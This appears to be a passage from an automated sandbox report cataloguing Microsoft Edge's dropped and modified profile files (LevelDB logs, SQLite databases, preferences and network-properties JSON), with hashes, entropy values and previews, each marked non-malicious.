                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):342
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.194819081363444
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:6:HCe05Qyq2PcNwi23oH+Tcwt8a2jMGIFUt8YCe0iG1Zmw+YCe0HQRkwOcNwi23oHr:fyVvLZYeb8EFUt88tG1/+8AI54ZYeb8N
                                                                                                                                                                                                                                                                                                                    MD5:4DABB41061FDEF8298E738C4DA6E789F
                                                                                                                                                                                                                                                                                                                    SHA1:586FCBDEC6C8940BCCDC468882B90D6FD07C65FB
                                                                                                                                                                                                                                                                                                                    SHA-256:928AD1AA85F40776F38867B1E3671732459308C1F6852668E8E0E015A2D5689C
                                                                                                                                                                                                                                                                                                                    SHA-512:05436433D025F0039D3134A333B698B3A7D4DCBF00A37F6FBEA3CEFCA2D8CDCE19ABE33804E16A225614D906758709B933320D33334911870FE7DCCCDA4593A2
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:2024/11/27-04:49:12.639 1f30 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/11/27-04:49:12.643 1f30 Recovering log #3.2024/11/27-04:49:12.651 1f30 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):342
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.194819081363444
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:6:HCe05Qyq2PcNwi23oH+Tcwt8a2jMGIFUt8YCe0iG1Zmw+YCe0HQRkwOcNwi23oHr:fyVvLZYeb8EFUt88tG1/+8AI54ZYeb8N
                                                                                                                                                                                                                                                                                                                    MD5:4DABB41061FDEF8298E738C4DA6E789F
                                                                                                                                                                                                                                                                                                                    SHA1:586FCBDEC6C8940BCCDC468882B90D6FD07C65FB
                                                                                                                                                                                                                                                                                                                    SHA-256:928AD1AA85F40776F38867B1E3671732459308C1F6852668E8E0E015A2D5689C
                                                                                                                                                                                                                                                                                                                    SHA-512:05436433D025F0039D3134A333B698B3A7D4DCBF00A37F6FBEA3CEFCA2D8CDCE19ABE33804E16A225614D906758709B933320D33334911870FE7DCCCDA4593A2
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:2024/11/27-04:49:12.639 1f30 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/11/27-04:49:12.643 1f30 Recovering log #3.2024/11/27-04:49:12.651 1f30 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.769254047197745
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:192:tTRY+iiCKpeQSEpgg8W0i4CexrtV1UXcf0L/ZJVb:VRBnSYgg8W0i4CebsXI0LhJVb
                                                                                                                                                                                                                                                                                                                    MD5:DCAF027E8B60CC8FA623DC2C83DC27DD
                                                                                                                                                                                                                                                                                                                    SHA1:EC712E6CDFA985B46308F97ECE472852E22B928E
                                                                                                                                                                                                                                                                                                                    SHA-256:1342F667555067559223EFFD8701DF1CC1C0C74732E712198668E648E0900686
                                                                                                                                                                                                                                                                                                                    SHA-512:778A9BEE21654AB90348EE2749EBE60F0BB062A2FF2C73C91015722B344EFBBC9400BAF524990A209BD4423810E1794905E214AFB2FA5DAB6FE23A04E27B38DC
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):1618
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.302994819295006
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:48:YcCpWsduCvsafc7leeBRsygCgkhYhbyD0:F2vu22keBxukOhn
                                                                                                                                                                                                                                                                                                                    MD5:90B46E2386024DB7264E402160E5F3B4
                                                                                                                                                                                                                                                                                                                    SHA1:3B2E2F784405DFE32CFE038FAF9F0121224877BB
                                                                                                                                                                                                                                                                                                                    SHA-256:C56B810798569D26A6B771B8DED39C12F26FAC419F019BC878C6B001FBFA501D
                                                                                                                                                                                                                                                                                                                    SHA-512:FA97B24F01A6378FA4A2B3875E9694AC90F0C469E14675FE657DB2F6728C9C9A5D665766F97FE72F533AA89E38C0F0B700C364B85C75867AB6F0083EDD05B186
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218151956","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218812706","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwc
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):1618
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.302994819295006
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:48:YcCpWsduCvsafc7leeBRsygCgkhYhbyD0:F2vu22keBxukOhn
                                                                                                                                                                                                                                                                                                                    MD5:90B46E2386024DB7264E402160E5F3B4
                                                                                                                                                                                                                                                                                                                    SHA1:3B2E2F784405DFE32CFE038FAF9F0121224877BB
                                                                                                                                                                                                                                                                                                                    SHA-256:C56B810798569D26A6B771B8DED39C12F26FAC419F019BC878C6B001FBFA501D
                                                                                                                                                                                                                                                                                                                    SHA-512:FA97B24F01A6378FA4A2B3875E9694AC90F0C469E14675FE657DB2F6728C9C9A5D665766F97FE72F533AA89E38C0F0B700C364B85C75867AB6F0083EDD05B186
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218151956","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218812706","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwc
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):36864
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.2775099464718163
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:48:TFkIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cS2Wc:JkIEumQv8m1ccnvSNDHiibM1a
                                                                                                                                                                                                                                                                                                                    MD5:279F4A7025A5571BB7AA10D16545E2B2
                                                                                                                                                                                                                                                                                                                    SHA1:D8CA3DD1085CA4683944FCA5BF24A468D306F6A4
                                                                                                                                                                                                                                                                                                                    SHA-256:3F46B107CA5FDFA795F532DA2BBD2FEE0DAEE1AC9243513AF5B28137206FC090
                                                                                                                                                                                                                                                                                                                    SHA-512:8CCDAED7D7D031340B0B0E44CCD9E237DD1F5ACDD8CC7A03E2F4CC8AB726B57F461CA46BD849AC1E2CEF4DB9AA4FB2BB5E7D6CA9D41C0889966370C910F2196D
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):40
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                    MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                    SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                    SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                    SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                                                    Size (bytes):1768
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.30219944836576
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:48:YcCpfgCzsmtsHfcKsFVleeBkBRsFkcCgHzYhbyD0:F2fRU6VkeBkB2kcTUhn
                                                                                                                                                                                                                                                                                                                    MD5:E8C62B4A66D1B8E013596B476770567E
                                                                                                                                                                                                                                                                                                                    SHA1:509D12D2DBFA79D3A9BDEFA5141C65193EF524C4
                                                                                                                                                                                                                                                                                                                    SHA-256:E25E3BF018735FCDEF127AB5F95B9A837C8B62B285341A728C65D788A60E31E6
                                                                                                                                                                                                                                                                                                                    SHA-512:3F2BD138186354CA00F1D7ED01C73DB1C6D644EE68BEB4B216E9104181C3E3D5A5016E074BA7E3D9EF8A4069B2932B23A14DDBB5502A8A0A3BF3CF6A9A3BABCB
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379766557844418","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379766562207513","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13377268165035309","port":443,"protocol_str":"quic"}],"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA="
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):1618
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.302994819295006
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:48:YcCpWsduCvsafc7leeBRsygCgkhYhbyD0:F2vu22keBxukOhn
                                                                                                                                                                                                                                                                                                                    MD5:90B46E2386024DB7264E402160E5F3B4
                                                                                                                                                                                                                                                                                                                    SHA1:3B2E2F784405DFE32CFE038FAF9F0121224877BB
                                                                                                                                                                                                                                                                                                                    SHA-256:C56B810798569D26A6B771B8DED39C12F26FAC419F019BC878C6B001FBFA501D
                                                                                                                                                                                                                                                                                                                    SHA-512:FA97B24F01A6378FA4A2B3875E9694AC90F0C469E14675FE657DB2F6728C9C9A5D665766F97FE72F533AA89E38C0F0B700C364B85C75867AB6F0083EDD05B186
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218151956","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218812706","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwc
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):40
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                    MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                    SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                    SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                    SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.8350301952073809
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
                                                                                                                                                                                                                                                                                                                    MD5:0DAD8D7F079797377CD56DAE47E1A619
                                                                                                                                                                                                                                                                                                                    SHA1:A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
                                                                                                                                                                                                                                                                                                                    SHA-256:7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
                                                                                                                                                                                                                                                                                                                    SHA-512:5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):9576
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.1121421679451435
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:192:st8kdpVCstYyaNP9kHgF8KbV+FyEQAZOP+YJ:st8QYstYtJfbGxQV
                                                                                                                                                                                                                                                                                                                    MD5:49050D6D8B063A91634693D5FD725A4B
                                                                                                                                                                                                                                                                                                                    SHA1:920C9AA0FBF820BAE95F259F0E38F59D6FD24AF1
                                                                                                                                                                                                                                                                                                                    SHA-256:DD1893CF0F6BE219C61C52C8A5B5A3AA836769D3ED0F7790EAF4EB7A58E4C356
                                                                                                                                                                                                                                                                                                                    SHA-512:E1C5EA530111CD62D8857C6162BFF4EDC433E9DA651CA04E357E63D19C609A89956D31600639B4362EE8FCC4425CC7D59AAC43FA581567C4BC0647EAC50ECA84
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377174552765759","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):9576
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.1121421679451435
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:192:st8kdpVCstYyaNP9kHgF8KbV+FyEQAZOP+YJ:st8QYstYtJfbGxQV
                                                                                                                                                                                                                                                                                                                    MD5:49050D6D8B063A91634693D5FD725A4B
                                                                                                                                                                                                                                                                                                                    SHA1:920C9AA0FBF820BAE95F259F0E38F59D6FD24AF1
                                                                                                                                                                                                                                                                                                                    SHA-256:DD1893CF0F6BE219C61C52C8A5B5A3AA836769D3ED0F7790EAF4EB7A58E4C356
                                                                                                                                                                                                                                                                                                                    SHA-512:E1C5EA530111CD62D8857C6162BFF4EDC433E9DA651CA04E357E63D19C609A89956D31600639B4362EE8FCC4425CC7D59AAC43FA581567C4BC0647EAC50ECA84
                                                                                                                                                                                                                                                                                                                    Malicious:false
